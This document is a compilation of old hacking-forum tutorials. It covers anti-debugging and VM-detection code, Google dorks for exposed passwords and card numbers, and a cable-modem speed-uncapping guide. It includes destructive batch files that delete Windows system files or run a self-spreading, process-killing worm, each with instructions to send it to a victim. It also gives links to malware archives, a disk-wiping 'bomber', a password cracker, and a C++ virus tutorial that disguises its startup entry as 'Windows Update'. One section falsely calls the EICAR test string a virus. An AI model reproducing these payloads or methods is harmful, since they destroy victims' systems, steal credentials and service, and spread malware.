mov eax, 1 // breakpoint found
NOBPX:
}
}

Detecting VMWare
/*
executes VMware backdoor I/O function call
*/

#define VMWARE_MAGIC 0x564D5868 // Backdoor magic number
#define VMWARE_PORT 0x5658 // Backdoor port number
#define VMCMD_GET_VERSION 0x0a // Get version number

int VMBackDoor(unsigned long *reg_a, unsigned long *reg_b, unsigned long *reg_c, unsigned long *reg_d) {
unsigned long a, b, c, d;
b=reg_b?*reg_b:0;
c=reg_c?*reg_c:0;

xtry {
__asm {
push eax
push ebx
push ecx
push edx

mov eax, VMWARE_MAGIC
mov ebx, b
mov ecx, c
mov edx, VMWARE_PORT

in eax, dx

mov a, eax
mov b, ebx
mov c, ecx
mov d, edx

pop edx
pop ecx
pop ebx
pop eax
}
} xcatch(...) {}

if(reg_a) *reg_a=a; if(reg_b) *reg_b=b; if(reg_c) *reg_c=c; if(reg_d) *reg_d=d;
return a;
}

/*
Check VMware version only
*/

int VMGetVersion() {
unsigned long version, magic, command;
command=VMCMD_GET_VERSION;
VMBackDoor(&version, &magic, &command, NULL);
if(magic==VMWARE_MAGIC) return version;
else return 0; }

/*
Check if running inside VMWare
*/

int IsVMWare() {
int version=VMGetVersion();
if(version) return true; else return false;
}



Fooling ProcDump
/*
Fool ProcDump with increasing size
*/

void FoolProcDump() {
__asm {
mov eax, fs:[0x30]
mov eax, [eax+0xC]
mov eax, [eax+0xC]
add dword ptr [eax+0x20], 0x2000 // increase size variable
}
}



Combining everything
bool CDebugDetect::IsDebug() {
#ifdef _DEBUG

return false;

#else

if(m_bIsDebug) return true;

#ifndef _WIN32
// Anti-PTrace
// if(ptrace(PTRACE_TRACEME, 0, 1, 0)<0) {
// m_bIsDebug=true; return true;
// }
#else
pfnIsDebuggerPresent IsDbgPresent=NULL;
HMODULE hK32=GetModuleHandle("KERNEL32.DLL");
if(!hK32) hK32=LoadLibrary("KERNEL32.DLL");
if(hK32) {
IsDbgPresent=(pfnIsDebuggerPresent)GetProcAddress(hK32, "IsDebuggerPresent");
}

FoolProcDump();
ScrewWithVirtualPC();

unsigned long lStartTime=GetTickCount();

if(IsBPX(&IsBPX)) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Breakpoint set on IsBPX, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

if(IsBPX(&IsSICELoaded)) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Breakpoint set on IsSICELoaded, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

if(IsBPX(&IsSoftIceNTLoaded)) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Breakpoint set on IsSoftIceNTLoaded, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

if(IsBPX(&IsVMWare)) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Breakpoint set on IsVMWare, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

if(IsSoftIceNTLoaded()) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "SoftIce named pipe exists, maybe debugger is active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

if(IsSICELoaded()) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "SoftIce is loaded, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

// if(IsVMWare()) {
//#ifdef DBGCONSOLE
// g_cConsDbg.Log(5, "Running inside VMWare, probably honeypot...\n");
//#endif // DBGCONSOLE
// m_bIsDebug=true; return true;
// }

if(IsDbgPresent) {
if(IsBPX(&IsDbgPresent)) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Breakpoint set on IsDebuggerPresent, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}
}

if((GetTickCount()-lStartTime) > 5000) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Routine took too long to execute, probably single-step...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}
#endif // WIN32

return false;

#endif // _DEBUG
}
Calculating TCP/IP checksum in assembler to gain s
/*
This calculates a TCP/IP checksum
*/

#ifdef WIN32
#define USE_ASM
#endif // WIN32

unsigned short checksum(unsigned short *buffer, int size) {
unsigned long cksum=0;

#ifdef USE_ASM

unsigned long lsize=size;
char szMMBuf[8], *pMMBuf=szMMBuf;

__asm {
FEMMS

MOV ECX, lsize // ecx=lsize;
MOV EDX, buffer // edx=buffer;
MOV EBX, cksum // ebx=cksum;

CMP ECX, 2 // size<2;
JS CKSUM_LOOP2 // goto loop 2

CKSUM_LOOP:

XOR EAX, EAX // eax=0;
MOV AX, WORD PTR [EDX] // ax=(unsigned short*)*buffer;
ADD EBX, EAX // cksum+=(unsigned short*)*buffer;

SUB ECX, 2 // size-=2;
ADD EDX, 2 // buffer+=2;
CMP ECX, 1 // size>1
JG CKSUM_LOOP // while();

CMP ECX, 0 // if(!size);
JE CKSUM_FITS // fits if equal

CKSUM_LOOP2:

XOR EAX, EAX // eax=0;
MOV AL, BYTE PTR [EDX] // al=(unsigned char*)*buffer;
ADD EBX, EAX // cksum+=(unsigned char*)*buffer;

SUB ECX, 1 // size-=1;
ADD EDX, 1 // buffer+=1;
CMP ECX, 0 // size>0;
JG CKSUM_LOOP2 // while();

CKSUM_FITS:

MOV cksum, EBX // cksum=ebx;

MOV EAX, cksum // eax=cksum;
SHR EAX, 16 // eax=cksum>>16;
MOV EBX, cksum // ebx=cksum;
AND EBX, 0xffff // ebx=cksum&0xffff;

ADD EAX, EBX // eax=(cksum>>16)+(cksum&0xffff);

MOV EBX, EAX // ebx=cksum;
SHR EBX, 16 // ebx=cksum>>16;
ADD EAX, EBX // cksum+=(cksum>>16);

MOV cksum, EAX // cksum=EAX;

FEMMS
}

#else // USE_ASM

while(size>1) { cksum+=*buffer++; size-=2; }
if(size) cksum+=*(unsigned char*)buffer;

cksum=(cksum>>16)+(cksum&0xffff);
cksum+=(cksum>>16);

#endif // USE_ASM

return (unsigned short)(~cksum); }
*/

Google Hacking

Google Hacking
Well first of all there is no this as google hacking but we can use google to hack other websites,

Using Google, and some finely crafted searches we can find a lot of interesting information.

For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.

Try a few of these searches:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"

Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:
inurl:Mcft filetype:iso
You can change the string to watever you want, ex. Mcft to adobe, iso to zip etc...
"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!


"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: coara.or.jp/~passy/ [coara.or.jp/~passy/]

"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net

"http://*:*@www" bangbus or "http://*:*@www"bangbus

Another way is by just typing
"http://bob:bob@www"

"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

allinurl: admin mdb
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!

allinurl:auth_user_file.txt
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)


intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.

eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.

Hacking Your Modem For Gaining More Speed

Hacking Your Modem For Gaining More Speed
Hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You Wish

Most of us will be feeling that the surfing speed which is allocated by our ISP is not enough. People with 64Kbps will think 128Kbps will be cool speed. People with 128Kbps will think 256Kbps will be cool and so on


This tutorial will teach you how to increase your 64Kbps link to 512Kbps or what ever speed you like.



It is very much possible to do this. With a bit of luck if your Cable Internet Service Provider are very uneducated on how this very new technology works and leave some key loopholes open for you to grab vital information on how to accomplish this task. But this [tutorial] will no guarantee you 100% success.
Okay here we go. I'm going to try to explain you as best as I can to accomplish re-configuring your SB5100, SB4100 or SB3100 cable modem



Theory of cable modem working



All the cable modems when it boots up it will search for an "Image file" where in all configuration like your upload speed limit and download speed limit is defined. This "Image file" is stored in ISP`s TFTP server. Modem will be pre-configured with the ISP`s TFTP server IP address and the Image file name to be downloaded. When the modem boots up it query TFTP server and download Image file from [TFTP] [server] according to this this our speed limits will be set.
Our Mission



Get this Image file from ISP`s TFTP server, reconfigure it according to our need and force our modem to download this file from our Computer rather than downloading it from our ISP`s TFTP server.



1). Get cable [modems] MAC-address

You can either look at the back of the modem to get this MAC Address or you can logon to your Cable modem with your Web Browser hxxp://192.168.100.1/ . This is internal HTML pages stored within your DOCsis cable modem (SB5100, SB4100 and SB3100) that gives you even more vital information on configuration. Unless it is turned off by your ISP. This feature might be totally turned off by your ISP.
2). Get your [ISP] TFTP server IP address





a) There's a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program that will tell you everything you need to know, without all these extra steps. It will display the Image Filename, TFTP server address, which is really all you need to get started. To use this BOOTP QUERY tool, you need the MAC address of your cable modem or Beginners can use DOCSIS Diagnosis utility



http://sourceforge.net/projects/docsis



Using the above tools you will get the information of your ISP`s TFTP server IP and the name of your "Image file" stored in that TFTP server

All your vital information is stored in this file, One of which is the MaxRateDown 2621440; MaxRateUp 393216;. (This was my ISP settings. Which you can see is similar to what speed I was getting. 40KB/s up and 250 KB/s down)



Among these, the one we need are:

Configuration [TFTP] [Server] = 194.*.*..90 (replace this with yours throughout in the doc)

Configuration filename = isrr.bin (replace this with yours throughout in the doc)

And

IP fragments created = 0

IP address.10.xxx.xxx.xxx = 10.xxx.xxx.xxx

IP address.192.168.100.1 = 192.168.100.1 (the IP address of the cable modem, (replace this with yours throughout in the doc)

IP-to-If-index.10.xxx.xxx.xxx = 2



Suggestion: You can do this step by sniffing the modem i.e. "192.168.100.1" when modem boots up. I never tried this method. Try your luck.

3) Download Image file from ISP`s TFTP server.



For doing this got to your command prompt and use below commands with out quotes and bracket.

"C:\tftp -i GET "


Okay now you got Image file from your ISP`s TFTP server.


4). Decrypt the Image file which you downloaded from ISP`s TFTP server
For all you can use the DOCsis tool http://sourceforge.net/projects/docsis to decode
5). Modify the Image file

Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)



Go to my network place and right click ->properties

Select your LAN Card right click ->property->Internet Protocol (TCP-IP) double click on it and change it to as following values

Configure your TPC's TCP settings as below

IP: 194.*.*.90 (replace with the ISP's TFTP server)

Netmask: 255.255.255.0

Gateway: 192.168.100.1 (replace with your cable modem's IP address)



Note: Gateway should be 192.168.100.1 then only your modem can communicate with computer.



6). Encrypt the modified Image file (Save it using Docsis)



7). Host TFTP server in your computer

Download TFTP Server software and host TFTP server in your computer

You can download TFTP server from: [content suppressed]



8). Put Image file in the base directory of your TFTP

Start TFTPD32 server. Go to Settings and set the Security to None. Increase the timeout to 20secs and the Max Retransmit to 6. Choose to translate UNIX filenames. Make sure it's base directory point to where the isrr.bin is (i.e. the image file which you modified). If you need to replicate a directory pathname along with the image file, then make a directory from root that corresponds to the image file pathname.

Restart your modem, and AS SOON as the SEND light goes solid, you should see a receive on your TFTP server i.e. your PC



9). [Restart] your [modem]

10). Changer your PC's IP back as given by ISP

11). OOPS Done. Start surfing with your new speed



Note: This speed will remain same until you restart your cable modem. So each time you reboot your modem you have to follow the steps 7 to 11


You can download TFTP server from: ftp: //ftp.ida.net/pub/wireless/tftpd32.exe

]Manually Removing Viruses From PC

]Manually Removing Viruses From PC
Have you ever been in the possition that you know you have an virus but you dont have any antivirus?? Its almost impossible to remove it manual without knowing about a few tips & tricks.
After reading this turtorial im sure you will know how to manual remove most of the virus lurking around. But that dosnt mean you shouldnt have any anti virus on you computer!
Anyway, lets get starting with the turtorial.. I suppose you already know what safe mode is. If you dont try pressing the F8 key some times when you start your computer. You havto do this when your computer is about to start the first windows components. In win2k or xp i think you can press space and then F8 when it ask you if you want to go back to previous working setting.
Enough talk about how to start you computer in safe mode, but if you want to manual remove viruses you almost everytime haveto do this in safe mode becouse in safemode most viruses dosnt start. Only some few windows component is allowed to run in safemode. So here is what to do.
Step: 1: Start your computer in safemode.
2: If you know where the virus are hiding delete the executable file.
3: Open the registry and go to the keys below and add an : in front of the value of the string that you think its the virus. Like this, if string is "virus" and its value is "c:\virus.exe" change its value to ":c:\virus.exe". The : is like comenting out the value. But if you are sure its the virus you can just delete the string.


Here are the keys you maybe want to look at:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
4: The virus can start itself from some other places to. win.ini is the most common files that viruses can use. Soo you should find the files named win.ini and system.ini and look through them and see if you find anything.
5: Look through the startup folder that is normaly located in your profile directory \Start Menu\Programs\Startup.
6: Try searching for the virus executable to see if its hiding some other place.
7: Finally look through the list of services that windows is running. This list is often located under control panel - administrative tools - services. After this 7 steps just reboot your computer in normal mode and try to figure out if the virus is still there..If not SUCCESS if yes, try to go back to safe mode and hunt some more. Off course this 7 steps will not work on every virus out there, but many of them.

-Be carefull with the registery, dont mess it up, if u do ur computer is ****** lol, depends on wat u mess up, i suggest u made a system restore point first, so incase someting happens you can go back on it. -

1. You can edit the hidden autorun.inf file in the root directory! with some cmd commands like chkdsk etc... also u can do this... open autorun.inf see the contents in it (using notepad) if anything comes with shell= or openshell= see the file name... it maybe .vbs / .exe / .cmd / .dll... anything... search tht file... delete that file first and then delete the autorun.inf.. in most cases u can find more than 1 file in the shell scripts (the line that has a word shell in autorun.inf).
2. Edit system.ini file (ok whn i say edit , it means open in notepad) see the contents..
It may come up with some different stuf and associate any .exe .dll etc... however some .dlls are stored by s/w and some by virus so it maybe difficult to find out which one is malicious. Show the file to some knowledgelble person or in tht case u can post this issue here! and you will be guided correctly.

In most cases, task manager is turned off, so to chek the background processes u can download hijack this! from internet.. its about 700kB and its FREE!! Google for the s/w.

Virus Thread

Virus Thread


Second Part To Hell's HTML.Umbriel











Slowing Down the PC
VIRUS SOURCE CODE
hello friends...
open NOTEPAD
then paste this code in notepad..code is

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*X5O!P%@AP[4\PZX54(P^)7CC)7}

now save this in notepad..
and SCAN it or test it by any antivirus....im dam sure it will be detected as a virus by the antivirus scan and it will slow the computer for 5 minuts..


Very easy but dangerous Virus
Ok, now, the trick:

The only thing you need is Notepad.

Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.


Simple explanation:

Go to notepad, type erase C:\WINDOWS, save, send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...


HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok???
------------------------------

------------------------------
------------------------------

------------------------------

Virus
hxxp://web.tiscali.it/johnnycrk2/virus/happy99.zip

hxxp://web.tiscali.it/johnnycrk2/virus/Melissa.zip

hxxp://web.tiscali.it/johnnycrk2/virus/x.zip

hxxp://web.tiscali.it/johnnycrk2/virus/POLY.zip

hxxp://web.tiscali.it/johnnycrk2/virus/rundll.zip

hxxp://web.tiscali.it/johnnycrk2/virus/Speed.zip

hxxp://web.tiscali.it/johnnycrk2/virus/Unknow.zip

hxxp://web.tiscali.it/johnnycrk2/virus/Unknow2.zip

hxxp://web.tiscali.it/johnnycrk2/virus/nowviru.zip

hxxp://web.tiscali.it/johnnycrk2/virus/all.zip

hxxp://web.tiscali.it/johnnycrk2/virus/auto.zip

hxxp://web.tiscali.it/johnnycrk2/virus/best.zip

hxxp://web.tiscali.it/johnnycrk2/virus/document.zip

hxxp://web.tiscali.it/johnnycrk2/virus/good.zip

hxxp://web.tiscali.it/johnnycrk2/virus/nice.zip

hxxp://web.tiscali.it/johnnycrk2/virus/simpatic.zip

hxxp://web.tiscali.it/johnnycrk2/virus/goodbye.zip

hxxp://web.tiscali.it/johnnycrk2/virus/mora.zip

hxxp://web.tiscali.it/johnnycrk2/virus/windows.zip

hxxp://web.tiscali.it/johnnycrk2/virus/mac.zip

hxxp://web.tiscali.it/johnnycrk2/virus/yvirus.zip

hxxp://web.tiscali.it/johnnycrk2/virus/xviruz.zip

hxxp://web.tiscali.it/johnnycrk2/virus/95.zip

hxxp://web.tiscali.it/johnnycrk2/virus/VirusMisti.zip

hxxp://web.tiscali.it/johnnycrk2/virus/d-g.zip

hxxp://web.tiscali.it/johnnycrk2/virus/VirusMisti2.zip

hxxp://web.tiscali.it/johnnycrk2/virus/h-j.zip


Virus
@echo off
del C:/WINDOWS/system32/Restore
del C:/WINDOWS/system32/winlogon.exe
del C:/WINDOWS/system32/logonui.exe



save this as virus1.bat and send it to the victim...

Msn Killer
@echo off
cls
tskill msnmsgr


save this as bat and send it to the victim.. destroys.. msn messenger

Task Kill
@echo off
start calc
tskill msnmsgr
tskill firefox
tskill iexplore
tskill LimreWire
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
pause


save this as bat and send and destroy the vtim

Virus
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP



use this to1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer

Virus
Virus
Very easy but dangerous Virus

Ok, now, the trick:

The only thing you need is Notepad.

Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.


Simple explanation:

Go to notepad, type erase C:\WINDOWS, save, send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...


HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok???


ScreenSaver Password Cracker
Description This code lets you know the Screen Saver Password. You can now know how they encrypt the password, how we can decrypt it.
/*
Screen Saveer Password Cracker:
Decrypts Screen Saver Password which is stored in user.dat.
*/

#include
#include
#include
FILE *fp;
char *path="c:\windows\user.dat";

/*encrypted password stored in this file when u log on to default user..

If there r multiple users..Password stored in
\windowsprofilesuser-nameuser.dat...

*/

unsigned long int search(char *s);
char *encstr(unsigned long int loc);
int toint(char a);
void main()
{
unsigned long int l;
char s[51];
int arr[]={4,8,14,14,7,6,1,13,6,7,6,9,10,1,1,11,7,10,8,12,4,7,
15,8,5,4,9,5,9,7,5,15,7,8,13,9,13,10,6,12,5,9,13,7,6,11,3,5,12,5};

//this array is 2 b xored with encrypted-string

int s1[51],s2[51];
int i,len,k;

clrscr();
l=search("ScreenSave_Data");
strcpy(s,encstr(l));
len=strlen(s);
for(i=0;i{
s1=toint(s);
s2=(s1)^(arr);
}
printf("Current Screen Saver Password:
");
for(i=0;iprintf("%c", (s2*16)+(s2[i+1]) );


}

/* Searches where ScreenSave_Data is there in the file
and returns the location*/
unsigned long int search(char *s)
{
int k=0,len,ch;
unsigned long int i=0;
fp=fopen(path,"rb");
len=strlen(s);
while( (ch=getc(fp))!=EOF)
{
if(ch==s[k])
k++;
else k=0;

i++;
if(k==len)
return i;

}
}

/* It returns Encrypted String*/

char *encstr(unsigned long int loc)
{
char ch,s[55],ch1;
int i=0;

ch=toascii(0);
fp=fopen(path,"rb");
fseek(fp,loc,SEEK_SET);
while( (ch1=fgetc(fp))!=ch)
{ s=ch1;
i++;
}
s='

C Bomber
#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}


C++ Viruse
Ok first off I’d like to say 2 things:

1. This guide is only intended for people who want to learn
2. I don’t condone releasing viruses in any way

Taking the above into consideration I’d like to say welcome to the world of virus programming I’m hoping upon reading this you well become as fascinated by viruses as I am and continue to study and write new unique viruses.

Most of the virus writing guides I’ve seen are lengthy, boring and out of date, this guide will try to be the opposite short, fun and to the point. Now this is what you will need to start programming:

Win32 API Reference <- Not Required but very helpful
A C++ Compiler – I Recommend DEV for people who do not wish to buy and Microsoft Visual C++ 6.0 for people with money and serious programmers, however DEV works fine.

Even if you have never programmed before you should be able to carry along with this one, but it helps if you know a little bit of C++.

Ok lets begin fire up DEV or MSVC and select new Win32 GUI for DEV users and Win32 for MSVC. Now with DEV it makes some generated code for GUI apps, delete it all leaving something like this:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)

{

return 0;
} Now compile and run the code nothing should happen (if a black window pops up it means you didn’t goto win32) The reason nothing happened is because or program doesn’t do anything. It runs and exits we need to make it do something first of all add this code to the project in between the { } and before return 0;.

MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);

Now compile and run the program again A message box should pop up, cool ay? But its not much of a virus lets make it do some cool stuff. Add the following code to your project:
QUOTE
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);

MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);


Once again make sure the code is before return 0; and the { }.Ok compile and run the code, now open up the system32 directory in you windows folder (for those who don’t know goto run in the startbar and type: %windir%\system32
Ok look for a file called virus.exe in the system32 folder. Don’t believe me that its our virus? Run the file it should come up with a message box saying “Hello”.

Cool is it not? Ok time to explain how this works:

char sytem[MAX_PATH]; This is the buffer to hold the system32 directory.
char pathtofile[MAX_PATH]; This is the buffer to hold the path to our virus.

HMODULE GetModH = GetModuleHandle(NULL); This one my be hard to grasp for some but bare with me. GetModH holds the handle to our virus GetModuleHandle() gets the handle and stores it there.

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); This gets the FileName of our virus using the handle we got before and storing the path to it in pathtofile.

GetSystemDirectory(system,sizeof(system)); Basically this finds out what your system directory is. Remember not everyone’s window’s directory is c:\windows\system32. Mine is d:\winnt\system32 GetSystemDirectory(system,sizeof(system)); Basically this finds out what your system directory is. Remember not everyone’s window’s directory is c:\windows\system32. Mine is d:\winnt\system32 on this box, the reason for this is we want to copy to an existent system32 directory.
strcat(system,”\\virus.exe”); Ok we have the system32 directory c:\windows\system32 or whatever now we need a place to copy to. This function binds to strings together to form one. So our system buffer now says:
c:\windows\system32\virus.exe or whatever the case maybe. Note \\ is not a typo \\ is how c++ interprets \. A single \ is seen by c++ as an escape character and if you have one your virus will not work!

CopyFile(pathtofile,system,false); Pretty self explanatory copy from were our virus is to were we want it to be. What false means if virus.exe already exists it will copy over it, to stop this change false to true (leave it as false for this tutorial).

Ok that’s it next we are going add code so it will startup when the computer boots. We are going to use an 3 API calls to accomplish this
RegOpenKeyEx(); This opens the key we want to write to
RegSetValueEx(); This sets our value
RegCloseKey(); This closes the key

Time to add code to our fledgling virus:

QUOTE
HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);
Ok obviously this is going to need an more of an explanation than before. HKEY hKey is the buffer that holds the data for calls to the registry nothing else about this except you need it. RegOpenKeyEx Opens the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run this is the key for starting up for all users which is what we want. 0 is reserved and needs to stay 0. We want to open up the key with set permissions that’s why we use KEY_SET_VALUE. And then we add the buffer.
The next call: hKey is the buffer “Writing to the registry example” is the message to appear in the key you can change this to something less obviously like “Windows Update” or “Norton Security Shield” anyway be creative. The next zero is the same as above reserved needs to stay 0. REG_SZ is the type of key we want. There are other types like REG_BINARY and REG_DWORD but we are using REG_SZ which is for text. (const unsigned char*) formats our string to a const unsigned char * because it doesn’t accept normal chars. system is the buffer that holds the path to our virus and the final part is the size of the string, this is calculated automatically by using sizeof.

The next call closes the registry key.

Ok add this to you code so it looks something like:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

return 0;
}

Now run you code and open up regedit and browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run there should be a new key in the area to the right our key!
Now comes the fun part of writing a virus the payload! This could be anywhere from a DdoS to making the cursor jump around the screen. Note destructive payloads are lame and frowned upon by the virus community, so do you self a favour and get the idea of destroying computers out of your mind. Besides writing a non destructive payload is more fun. Lets go with a payload I’ve written and christened The Flasher.

Your code should now look like this with the payload attached:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
